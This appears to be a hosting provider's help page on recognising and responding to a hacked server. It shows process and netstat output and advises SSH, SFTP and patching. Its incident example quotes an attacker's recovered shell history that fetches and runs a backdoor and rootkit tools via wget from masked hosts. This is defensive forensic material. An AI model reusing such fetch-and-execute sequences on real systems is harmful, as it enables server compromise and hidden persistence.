|
Search |
It doesn't only happen to others. How to see that a machine is hacked? By having a look at MRTG, you can't go wrong:   And on the machine, we find: root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400 [...] root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400 Obviously, the hacker has been able to launch softs in root. The machine is thus hacked and must be re-installed. # netstat -tanpu Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc # ps auxw | grep 28823 root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823 It exist launched softs, which have a pid and that are not seen by ps, surely due to the fact that ps has been replaced by a hacked ps that filters all softs of the hacker in order to trick the eye. # halt Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003... The system is going down for system halt NOW !! We immediately stop the machine. We can have the chance to have a SemiHackedMachine. An other experience: HackedMachineExample.. Why is the machine hacked? The origin of the problems are multiple, but we can sum up it as follows: you are not paranoid. You use telnet. Your login and password travel via Internet and they can be 'stolen' at any time. You must use SSH. Here is a manual about it: SshOnDedicated. You use FTP, your login and password travel on Internet and it's the same root password. Sftp is your solution. You use pop3/imap with the password and it's the root password. Use APOP or POP3S/IMAPS. Here is a manual about it: SmtpPop3Imap. If you don't update your server with releases ReleasePatch, your risk easy hack (about 250 scans are carried out a day on our network in order to detect security faults). What to do? If your server is hacked, it will be placed into a Rescue mode that only has FTP Read Only access, automatically you will receive your access code by email. You can then submit an incident ticket to ask for your machine to be placed in Rescue mode. You will have to explain your request and your commitment to correct before reactivation of your server. We will be vigilant to the fact that you have to fix the flaws before putting the server back online on the network in (HDD mode). Hack examples 1. CGI script fault Symptoms A g00dies.tgz file uploaded in /tmp with other files: x, k, etc... The x program is a backdoor, if it's launched, it gives access to the server. We have found the bash.history of nobody user in /tmp, here is the content: cd /tmp wget www.#######.com/x chmod +x x ./s ./x ./x ./x ./x./x ./x ./x ./x ./x wget www.#######.com/k chmod +x k ./k -d; /tmp/x ./x ./x ./x ./x ./x ./x ./ cd /tmp mkdir ., cd ., wget ######.go.ro/vampix tar zxvf vampix cd esc ./mingetty ./mingetty ./mingetty cd /tmp wget ######.go.ro/g00dies.tgz tar zxvf g00dies.tgz cd goodies mv stealth /tmp cd /tmp wget ######.go.ro/smth chmod +x smth ./smth cd /tmp wget ######.go.ro/g00dies.tgz tar zxvf g00dies.tgz cd goodies mv stealth /tmp /tmp/smth /tmp/stealth Comments Thanks to it, we can notice that commands have been placed as nobody, but this user is mainly used by Apache. It looks like the hacker benefited from a vulnerability of a CGI script. Resolution - Killer all suspected process in progress. The hacker is obviously not in root (it could actually benefit from a kernel default <2.4.24); However, we make some basic operations/verifications:
- Consult then Apache logs at about the time the hack happened to find the suspected script. |
